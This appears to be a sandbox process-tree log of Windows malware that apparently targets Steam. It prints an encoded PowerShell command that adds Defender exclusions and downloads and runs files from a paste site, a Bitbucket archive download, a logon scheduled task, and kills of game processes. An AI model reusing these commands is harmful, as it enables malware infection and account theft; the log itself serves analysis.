c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
1⤵
PID:3140

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s TokenBroker
1⤵
PID:3296

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:3384

C:\Users\Admin\AppData\Local\Temp\Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\Launcher.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:4412

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAagBpACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZwBhAHAAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBrAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaABlAHAAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAGwAZQBtADYAMQAxADEAMQAxADEAMQAxADEAMQAvAHIAYQB3ACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAbgBtAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAHAAZwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBqAGkAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAYgB3AGYAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbgB6AHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHEAdQBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwBpAGQAegAjAD4A"
3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:972

C:\Users\Admin\AppData\Roaming\rtjirqmr.y330.exe
"C:\Users\Admin\AppData\Roaming\rtjirqmr.y330.exe"
4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1692

C:\Windows\System32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\8EA3.tmp\8EA4.tmp\8EA5.bat C:\Users\Admin\AppData\Roaming\rtjirqmr.y330.exe"
5⤵
- Suspicious use of WriteProcessMemory
PID:4528

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
6⤵
PID:4988

C:\Windows\system32\chcp.com
chcp 1251
6⤵
PID:884

C:\Windows\system32\findstr.exe
findstr /c:"127.0.0.1 store.steampowered.com" "C:\Windows\System32\drivers\etc\hosts"
6⤵
PID:3860

C:\Windows\system32\findstr.exe
findstr /c:"127.0.0.1 steamcommunity.com" "C:\Windows\System32\drivers\etc\hosts"
6⤵
PID:3584

C:\Windows\system32\findstr.exe
findstr /c:"127.0.0.1 help.steampowered.com" "C:\Windows\System32\drivers\etc\hosts"
6⤵
PID:2000

C:\Windows\system32\schtasks.exe
schtasks /query /tn "MyBatchScript"
6⤵
PID:4252

C:\Windows\system32\schtasks.exe
schtasks /create /tn "MyBatchScript" /tr "\"C:\Users\Admin\AppData\Roaming\runHidden.vbs\"" /sc onlogon /rl highest /f
6⤵
- Creates scheduled task(s)
PID:376

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKCU\SOFTWARE\Valve\Steam" /v SteamPath
6⤵
- Suspicious use of WriteProcessMemory
PID:4500

C:\Windows\system32\reg.exe
reg query "HKCU\SOFTWARE\Valve\Steam" /v SteamPath
7⤵
PID:364

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Desktop
6⤵
- Suspicious use of WriteProcessMemory
PID:4704

C:\Windows\system32\reg.exe
reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Desktop
7⤵
PID:4688

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/k34gk349g34g3/56j56j5j56j/raw/0f83a68fcbec53d90c5d0c17a582d7652b840e57/lemon.rar', 'C:\Users\Admin\AppData\Local\Temp\downloaded_archive.rar')"
6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1464

C:\Windows\system32\tasklist.exe
tasklist
6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1028

C:\Windows\system32\find.exe
find /i "tf_win64.exe"
6⤵
PID:216

C:\Windows\system32\taskkill.exe
taskkill /f /im tf_win64.exe
6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3688

C:\Windows\system32\tasklist.exe
tasklist
6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3784

C:\Windows\system32\find.exe
find /i "dota2.exe"
6⤵
PID:424

C:\Windows\system32\taskkill.exe
taskkill /f /im dota2.exe
6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5028

C:\Windows\system32\tasklist.exe
tasklist
6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2692

C:\Windows\system32\find.exe
find /i "cs2.exe"
6⤵
PID:2648

C:\Windows\system32\taskkill.exe
taskkill /f /im cs2.exe
6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2756

C:\Windows\system32\tasklist.exe
tasklist
6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4360

C:\Windows\system32\find.exe
find /i "RustClient.exe"
6⤵
PID:4928

C:\Windows\system32\taskkill.exe
taskkill /f /im RustClient.exe
6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4620

C:\Windows\system32\tasklist.exe
tasklist
6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3256

C:\Windows\system32\find.exe
find /i "GTA5.exe"
6⤵
PID:3616

C:\Windows\system32\taskkill.exe
taskkill /f /im GTA5.exe
6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2292

C:\Windows\system32\tasklist.exe
tasklist
6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4972

C:\Windows\system32\find.exe
find /i "TslGame.exe"
6⤵
PID:4448

C:\Windows\system32\taskkill.exe
taskkill /f /im TslGame.exe
6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4932

C:\Windows\system32\tasklist.exe
tasklist
6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:516

C:\Windows\system32\find.exe
find /i "RainbowSix.exe"
6⤵
PID:2956

C:\Windows\system32\taskkill.exe
taskkill /f /im RainbowSix.exe
6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4672

C:\Windows\system32\timeout.exe
timeout /t 3
6⤵
PID:2788

C:\Windows\system32\tasklist.exe
tasklist
6⤵
- Enumerates processes with tasklist
PID:5028

C:\Windows\system32\find.exe
find /i "steam.exe"
6⤵
PID:660

C:\Windows\system32\taskkill.exe
taskkill /f /im steam.exe
6⤵
- Kills process with taskkill
PID:2824

C:\Windows\system32\timeout.exe
timeout /t 3
6⤵
PID:2792

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:1956

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:2132

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:1460

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
- Delays execution with timeout.exe
PID:4204

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4112

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:1156

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:2648

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4464

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:972

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4700

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:780

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:2644

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:2000

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4504

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:3868

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4360

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:2548

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2548 -s 268
7⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4348

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:32

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:3988

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:2880

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:780

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:3832

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:5036

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4152

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:352

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:2476

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:2552

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:3168

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4684

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:1132

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:1004

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:1516

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:32

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:2280

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:1736

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:2824

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:2896

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:2992

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:352

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:3564

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:2520

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:3228

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4684

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:2812

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:1460

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:2452

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:1512

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:1004

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:3380

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:2620

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4892

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:832

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4928

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:3040

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:1596

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4020

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:308

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4608

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:2232

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4936

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4548

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:972

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:3680

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:920

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:2276

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:884

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4504

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4476

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:2476

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:1856

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:1212

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4464

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:3972

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4168

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:600

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4684

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:2280

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:1520

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:1384

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4396

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:2992

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4560

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:3040

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4672

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:836

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4204

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:2660

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4696

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4360

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4472

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:2224

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4688

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:2788

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4660

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:884

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4396

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:3868

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:1840

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:1584

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:2552

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4884

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:2132

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4100

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:3584

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:308

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4548

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:1928

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:2824

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4688

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:2988

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:2264

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:5080

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4560

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4628

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:1596

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:5116

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:2552

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:2668

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:400

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:3832

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4472

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4864

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4864 -s 296
7⤵
PID:2620

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:2708

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:1464

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:3172

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:2476

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4600

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4432

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:428

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4264

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:2828

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:2284

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:2812

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:700

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:1208

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:524

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:208

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:2648

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:744

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4700

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:1844

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:1376

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:2896

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:1512

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:2996

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:240

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4136

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:780

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4040

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:664

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:2912

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
